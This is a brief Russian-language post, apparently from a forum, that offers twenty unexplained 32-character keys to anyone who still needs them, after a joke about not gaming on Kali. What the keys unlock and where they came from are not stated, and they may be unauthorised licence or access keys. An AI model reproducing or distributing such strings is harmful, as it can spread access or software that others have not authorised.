на kali в игры не играют)

Кому ключи до сих пор нужны, то вот.

PSKINdQe1GyxGgecYz2191H2JoS9qvgD

pHHlgpFt8Ka3Stb5UlTxcaEwciOeF2QM

61TvA2dNwxNxmWziZxKzR5aO9tFD00Nj

xTbXXOSBr0R65OcClImSwzadExoXU4tc

EJV3A4Mka2wPs7P8VBCO6xcpRe27iNJu

mEuInz8UH1ixLGJq4oQhEiJORERVG5xc

lkY0ng0XMo29zEhzyw3ibQfeEBxghwPF

syeCnFndQ8TE4qAGvhm9nZLBZOBgoLKd

7TeyFZ8oyLulHwYUOcSPzZ5w3cLYib61

v4YpsPUJ3wjDxEqywwu6aF5OZKWj8kik

dTNGRiwYNozXIDRf5DWyGNbkdiS5m3JK

kdnzf4fsYWQmGajRDn3hB0RElbUlIaqu

boYedPn8iDWi6GDSO6h2kz72VLt6bZ3S

FQNAMUdkeqXqVOdXsTLYeatFSpZSktdb

OygcaGSSq46Lg5fZiADAuFxl4OBbn7zm

XAbsu1Ruj5uhTNcxGdbGNgrh9WuMS1B6

nkGd8uVE4oryfUVvioprswdKGmA5InzZ

XYdjHDeJM36AjDfU1feBsyMJIj8XxGzD

EBeU0lGqtIO6yCxVFCWC4nUVbvovtjo5

OefcMxcunkm72Po71vVtX8zUN57vQtAC